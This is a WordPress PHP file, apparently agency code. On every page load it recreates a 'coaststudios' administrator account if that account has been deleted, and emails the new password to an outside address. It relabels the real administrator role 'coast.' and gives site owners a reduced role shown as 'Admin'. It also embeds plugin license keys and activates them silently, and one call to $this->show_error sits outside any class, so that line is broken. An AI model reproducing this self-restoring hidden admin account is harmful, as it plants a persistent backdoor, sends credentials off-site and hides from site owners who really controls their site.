<?php
add_action('init','add_coast_user');

function add_coast_user(){
	if(null== username_exists("coaststudios")){

		$ran_pass = uniqid();

		$user_id = wp_create_user("coaststudios",$ran_pass,"studio@coaststudios.com.au");
		wp_update_user(array( 'ID'=>$user_id, 'nickname' => "Coast", 'first_name' => "Coast" ));
		$user = new WP_User($user_id); $user->set_role('administrator');

		wp_mail("studio@wearecoast.com.au", get_site_url() . " Admin Account Regenerated", "The coaststudios Administrator account has been regenerated. Password: $ran_pass");

	}
	wps_change_role_name();
	add_client_role();
}

function add_client_role() {

	if(!empty(get_role("client")) || !is_null(get_role("client"))) {
		return;
	}

	//remove_role('client');
	$result = add_role('client', __('Admin'), array(
													"activate_plugins" 		=> true,
													"add_users" 			=> true,
													"create_users" 			=> true,
													"delete_others_pages" 	=> true,
													"delete_others_posts" 	=> true,
													"delete_pages" 			=> true,
													"delete_plugins" 		=> true,
													"delete_posts" 			=> true,
													"delete_private_pages" 	=> true,
													"delete_private_posts" 	=> true,
													"delete_published_pages" => true,
													"delete_published_posts" => true,
													"delete_themes" 		=> true,
													"delete_users" 			=> true,
													"edit_dashboard" 		=> true,
													"edit_others_pages" 	=> true,
													"edit_others_posts" 	=> true,
													"edit_pages" 			=> true,
													"edit_plugins" 			=> true,
													"edit_posts" 			=> true,
													"edit_private_pages" 	=> true,
													"edit_private_posts" 	=> true,
													"edit_published_pages"	=> true,
													"edit_published_posts" 	=> true,
													"edit_theme_options" 	=> true,
													"edit_themes" 			=> true,
													"edit_users" 			=> true,
													"export" 				=> false,
													"import" 				=> true,
													"install_plugins" 		=> true,
													"install_themes" 		=> true,
													"list_users" 			=> true,
													"manage_categories" 	=> true,
													"manage_links" 			=> true,
													"manage_options" 		=> true,
													"moderate_comments" 	=> true,
													"promote_users" 		=> false,
													"publish_pages" 		=> true,
													"publish_posts" 		=> true,
													"read" 					=> true,
													"read_private_pages" 	=> true,
													"read_private_posts" 	=> true,
													"remove_users" 			=> true,
													"switch_themes" 		=> false,
													"unfiltered_html" 		=> true,
													"unfiltered_upload" 	=> true,
													"update_core" 			=> false,
													"update_plugins" 		=> false,
													"update_themes" 		=> false,
													"upload_files" 			=> true
			));
}

function wps_change_role_name() {
	global $wp_roles;

	if ( ! isset( $wp_roles ) ) $wp_roles = new WP_Roles();

	$wp_roles->roles['administrator']['name'] = 'coast.';
	$wp_roles->role_names['administrator'] = 'coast.';
}

// add_action( 'admin_init', 'my_remove_menu_pages' );

function my_remove_menu_pages() {
	global $user_ID;

	if ( coast_get_user_role() == "client") {
		remove_menu_page('pb_backupbuddy_backup');
		remove_menu_page('sb-instagram-feed');
		remove_menu_page('theme-editor.php');
		remove_menu_page('tools.php');
		remove_menu_page('vc-general');
		remove_menu_page('ithemes-licensing');
		remove_menu_page('acf-field-group');
		remove_menu_page('wpseo_dashboard');
		remove_menu_page('acf-field-group');
	}
}

add_filter('acf/settings/show_admin', 'my_acf_show_admin');

function my_acf_show_admin( $show ) {
	if(coast_get_user_role() == "administrator") {
		return true;
	}
	return false;
}

function coast_get_user_role( $user = null ) {
	$user = $user ? new WP_User( $user ) : wp_get_current_user();
	return $user->roles ? $user->roles[0] : false;
}

function cs_add_license_keys() {
	if(!get_option("rg_gforms_key")){
		$key = "db0f18c3841d86d05b10d860aef1ec12";
		update_option("rg_gforms_currency", "AUD");
		update_option("rg_gforms_enable_akismet", "1");
		update_option("rg_gforms_key", $key);
	}

	if ((!get_option("acf_pro_license") || get_option("acf_pro_license_url", home_url()) != home_url()) && function_exists('acf_get_setting')) {
		$license_key = "b3JkZXJfaWQ9ODE0MTN8dHlwZT1kZXZlbG9wZXJ8ZGF0ZT0yMDE2LTA1LTEyIDA0OjA3OjQ1";
		$post = array(
					'acf_license' 	=> $license_key,
					'acf_version' 	=> acf_get_setting('version'), 'wp_name' => get_bloginfo('name'),
					'wp_url' 		=> home_url(),
					'wp_version' 	=> get_bloginfo('version'),
					'wp_language' 	=> get_bloginfo('language'),
					'wp_timezone' 	=> get_option('timezone_string')
				);

		$response = csframework_acfrequest('v2/plugins/activate?p=pro', $post);
		if(is_wp_error($response)) { return $this->show_error($response); }
		if( $response['status'] == 1 ) {
			$data = array( 'key' => $license_key, 'url' => home_url() );
			$value = base64_encode(maybe_serialize($data));
			update_option('acf_pro_license', $value);
			update_option('acf_pro_license_url', home_url());
		}
	}
}

function csframework_acfrequest( $query = 'index.php', $body = array() ) {
	$url = 'https://connect.advancedcustomfields.com/' . $query;
	$raw_response = wp_remote_post( $url, array( 'timeout' => 10, 'body' => $body ));

	if( is_wp_error($raw_response)) {
		return $raw_response;
	} elseif( wp_remote_retrieve_response_code($raw_response) != 200 ) {
		return new WP_Error( 'server_error', wp_remote_retrieve_response_message($raw_response) );
	}

	$json = json_decode( wp_remote_retrieve_body($raw_response), true );

	if( $json === null ) {
		return wp_remote_retrieve_body($raw_response);
	}
	return $json;
}
add_action('init', 'cs_add_license_keys');
